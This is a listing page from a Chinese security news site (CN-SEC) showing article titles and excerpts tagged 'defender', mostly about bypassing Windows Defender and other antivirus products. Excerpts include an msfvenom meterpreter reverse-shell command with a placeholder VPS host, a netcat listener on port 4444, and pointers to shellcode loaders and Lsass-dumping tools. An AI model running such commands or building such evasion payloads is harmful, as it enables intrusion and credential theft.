defender - 第 10 | CN-SEC 中文网

安全新闻

技术实践｜勒索病毒防御削弱技术对抗研究

前言01随着勒索病毒的猖獗，各种勒索病毒加密技术与防御对抗技术也在不断升级，即使对于有一定防御建设水平的企业来说，勒索病毒带来的损失也不能忽略。为了更好地对抗勒索病毒，我们有必要持续研究其防御削弱对抗...

01月25日41 views评论

阅读全文

安全工具

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

反序列化+远程分离免杀+反沙箱首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...

01月16日87 views评论

阅读全文

安全漏洞

PHEMEDRONE信息窃取者活动利用Windows SmartScreen绕过漏洞

翻译：Trend Micro的研究人员发现了一种利用漏洞CVE-2023-36025（CVSS评分8.8）的恶意软件攻击活动，以部署先前未知的恶意软件Phemedrone Stealer。这个漏洞已经...

01月16日40 views评论

阅读全文

安全文章

绕过Credential Guard 读取明文凭据

Tips +1 前言 Windows 10 之前，Lsass 将操作系统所使用的密码存储在其进程内存中当我们获取到机器权限后，经常使用Mimikatz在机器上获取各种凭证，包括明文密码，NTLM哈希...

12月21日59 views评论

阅读全文

安全工具

神兵利器 - 可以绕过 Windows Defender 检测的反向 Shell

地址：https://github.com/emrekybs/nim-shell$ apt install nim监听 $ nc -nvlp 4444原文始发于微信公众号（TtTeam）：神兵利器 -...

12月19日56 views评论

阅读全文

安全文章

【威胁感知】ATT&CK攻击链规则之Webshell检测与实践

0x00故事是这样的 1、在之前的文章《【威胁感知】ATT&CK攻击链规则检测梳理实践》中，我们详细介绍了如何检测文件重命名Windows勒索软件的监测。 2、本次将阐述T1505_003对应...

12月18日59 views评论

阅读全文

安全工具

ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）

免责声明由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号夜组安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立...

12月18日48 views评论

阅读全文

安全文章

Smbexec绕过Windows Defender

每日一句经典: 人生就像一杯茶，不会苦一辈子，但总会苦一阵子。动动您的小手，点点关注您的关注就是我更新的动力噢。这里字数可能不太够噢，后面可能会凑字数不要介意啦。首先使用原生的Smbexec.py执行...

12月14日42 views评论

阅读全文

安全文章

绕过Defender Dump Lsass进程(项目推荐)

这里推荐一个老外的Dump lsass进程的一个项目。一般Dump lsass进程的方式都会被Defender拦截掉。直接转储:使用rundll32.exeprocessdump:使用老外的项目:py...

12月04日89 views评论

阅读全文

安全工具

基于python的火绒、360、defender免杀shellcode loader

关于 shellcode loader,bypassav,免杀，一款基于python的shellcode免杀加载器 evilhiding v1.1 shellcode lo...

11月28日134 views评论

阅读全文

安全新闻

Security Copilot开启全面集成！微软发布AI安全产品路线图

点击上方蓝字关注我们测评你的薪资关注用户弹出对话框开始测评已关注用户点击下方即可测评微软推出首款集成SIEM、XDR和AI助手的统一安全运营平台，还有一系列人工智能改进安全效率和保障人工智能安全的产品...

11月21日31 views评论

阅读全文

安全文章

一拳打趴Windows Defender

点击蓝字关注我们免责声明本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权...

10月27日25 views评论

阅读全文

在线咨询

微信